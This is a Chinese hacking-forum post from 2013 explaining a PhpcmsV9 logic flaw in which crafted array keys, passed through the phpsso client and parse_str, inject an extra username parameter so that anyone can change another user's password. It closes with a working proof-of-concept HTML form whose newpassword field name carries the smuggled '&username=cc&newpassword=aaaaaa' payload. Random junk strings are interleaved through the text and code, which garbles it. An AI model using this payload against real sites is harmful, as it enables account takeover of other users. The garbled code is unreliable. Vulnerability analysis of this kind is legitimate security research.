找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1900|回复: 0
打印 上一主题 下一主题

PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 14:46:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
提到的通行证的代码:
* k- b$ c( }  Q! ?; G' |/ P
5 W& Q7 C8 r: Y' W: `4 p- J# T% A9 f' F
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);0 @2 z5 s# Y2 R! }
7 Z1 b- t% P5 E. u2 |  T) o+ g
在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
# z% O1 @7 K8 X0 ]" _, ~3 c1 p( a/ ]! F2 U3 Z
我把它留给了你们。
- V" h: o" L! Q3 Y3 b" m不知道你们发现了它没有。  B9 q+ ~9 z0 v: o. q4 k) ^
. k9 ^: U( S5 u* P5 i
我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。' q9 E! i( L0 S7 h' z) c" V

, U8 e" h( c2 m, U- w7 G所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。
- r- {" p# D6 Q2 q; ?. V7 q  x$ \3 {6 H5 m
也就是
: m+ i7 g- k: z1 X5 I' v) _3 d: m+ ]/ L! _/ _
username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。  h3 F2 {2 ~# i3 |, x& E
$ c! c3 f/ R3 |8 F
要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。
& G- S* M$ \1 M& K+ W* Z, d" {! O/ q9 _2 \
' ]! C* q9 P$ y( M8 y' v
其实我们有这样的机会,看看代码,如下:3 E- D7 B( E1 N

& `5 P5 M- p; V, X& s  }6 O# V' \0 u  _
public function auth_data($data) {
, d9 V  ~; \2 [5 i& h2 \4 |5 g: B                $s = $sep = '';
4 V" u1 M( }  A! T                foreach($data as $k => $v) {- K0 T! a" T$ v4 \$ ]% L
                        if(is_array($v)) {
" s. X4 Y/ e! ^. a% Q0 u6 c0 f                                $s2 = $sep2 = '';0 O& s+ H% \9 l
                                foreach($v as $k2 => $v2) {
! c0 Z7 v! H( a9 w6 D# l- q                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
) E% m# }% @3 Q+ X                                        $sep2 = '&';2 J& S& {3 \- h
                                }
  V" F4 \$ |) E. n3 B& ~& B6 Z: Q* s                                $s .= $sep.$s2;2 T7 x/ }" m+ D1 n$ K( x4 D9 y* ~
                        } else {4 V! q: h" {# s: E9 L/ {% R
                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
0 C& v! f: @9 O                        }
; Y4 H% W8 `: Y4 _                        $sep = '&';1 O! i& F7 h# ^  U( I1 @
                }1 d4 Z7 D8 R2 ?" Z& x) c4 D/ b1 b
; N! T' {# ]! A; U4 c
                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));+ j/ s! [/ N  J; m! S( ~$ x& d, o# O
                return $auth_s;
* [5 j% k0 c7 b8 m. u& F        }( t" ~4 c5 i6 h5 x% U

  C) B* |. `  R' o可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。
  X' I. `) @! W/ d& f+ L+ e6 Z- O% e! ^
举个例子
5 B6 I: b. M$ {3 [' N! m9 w2 X7 R7 F) K9 L4 U! G* v
$a[aaa=a&bbb] = 'a';5 }7 o! j: c: q" V7 @/ Z

* X% v( F- q9 ~8 L' s; n5 e& B4 s会变成aaa=a&bbb=a7 b) S  ?  e4 F6 C0 ?% s/ s
7 b6 k) P, v/ x" s8 q0 h
明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。4 D  Z6 |% h, d7 n+ A
. w+ l% y  B6 @; O1 G! j
这个时候,我们可以再去看一个函数。0 V; O5 D- Q& P
4 p1 n2 i0 i8 h  Z; l
就在这个文件内:
$ t' N7 v* \0 q2 _! K
  l, f3 |, ]/ Z- ^+ M8 v! _/ w0 c8 A3 c( X9 L2 T6 O8 N
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
  x  F1 Z1 _( l7 J                if($email && !$this->_is_email($email)) {
% Y8 u. A5 c$ V, m7 f6 |# y                        return -4;
. c& n) L# E% e. \) u7 x: [9 P: ^                }0 e- D( [# p6 s+ m5 V5 i! f
                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));9 A9 [0 ]+ `$ y8 X
        }) U7 Z+ s7 z" y; }- \8 z& N: q6 J

: ]* X8 i1 E* T9 K9 S8 Y这是向通行证发了这样一个请求。
- o. ]% Q' B1 K% K" d' {+ i8 a' S
4 V8 X6 F! F" c, w我们再跟到通信证代码里去看看,就会有所发现。
9 q; {8 D# ?* i, l# L1 K
/ ~5 Q+ [6 C, k5 G' Q; ]+ ]4 m& ~8 b$ C6 K3 y1 J
public function edit() {6 C8 _' E" ~2 h* [. `" M
//能省就省,太长了不是吗?
8 X6 J0 U4 k  @5 d. F  B7 ~/ B: s$ m9 ~( g4 N% m9 d
if($this->username) {2 E3 f; h$ u! X
//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。3 q# Z! X* k: u" @% D/ ?/ J
                                $res = $this->db->update($data, array('username'=>$this->username));% W! w) g. _5 K4 _
                        } else {, `8 w2 U" d! A8 w0 b
                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);6 R/ i/ h' i) D# ~" s8 A- r
                                $res = $this->db->update($data, array('uid'=>$this->uid));* E/ A; J( D( p6 H! N% x6 x  F
                        }
: e: o( M/ D) L& d
* Q# ]9 t( U$ A% W9 I9 Y* W- q好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:2 |4 P, l- g$ @( H, o
+ g+ U9 h( B; c
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')+ f( I3 ^$ y$ e5 H
4 l, f" e' g7 i
很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。( l& A( y/ N# U8 X5 g8 ~8 P
2 U3 y' [& Z& J, N+ D# i
我当然找到了:: S0 a2 n+ v5 }
phpcms9/phpcms/modules/member/index.php0 [# _/ ]5 B8 s, x  x. @

0 H4 c$ j  I5 y) m. w$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
- l8 w7 V% g* R7 _: Q
7 x1 A+ g- u6 E4 N. L' S5 F然后就没有然后了。
9 \1 }5 U: }0 x+ ]* q4 \* g& }/ y) @
<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">4 i# f* J3 Q0 C# A/ [$ h
                                <table width="100%" cellspacing="0" class="table_form">! j, ]4 b+ u, Z; S2 d" a, M0 d: N4 U! |
                                        <tr>2 N' W9 E8 a( M3 k
                                                <th width="80">邮箱:</th>        
- `  l1 b: Z$ s                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>! A5 p5 y+ N3 Y! E! V$ \( q1 L
                                        </tr>6 j' Y. h0 H# n) K5 H
                                        <tr>% L- h  {( S4 i
                                                <th width="80">原密码:</th>        
( |5 {; m4 P& ~; [  N5 e+ a                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
( N$ `& y7 S+ Q                                        </tr>2 A7 F1 B+ T, t- w+ e/ X3 n7 S6 Q% J
                                        <tr>
0 ]1 ]- k0 f; [# m  @                                                <th>新密码:</th>2 j% r2 H. Z' i% E5 g
                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>/ {- J. U5 i3 r8 Y
                                        </tr>0 A% v, c! M6 j. @( t) r$ v4 L
                                        <th></th>
7 t4 c( y( P% W6 K6 v- Y: r                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>4 p! g2 L# t% e/ U" W* M# k  ~
                                        </tr>
" q' f) d: p$ Y( r7 m0 Q% |                                </table>3 v8 d: X* h# @
3 }. g% y: M+ W( F; W
                               
" n* I( N* S" H$ c/ B5 G5 B& ?5 ?                        </form>; Y( O; l( h& a. W( [% V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表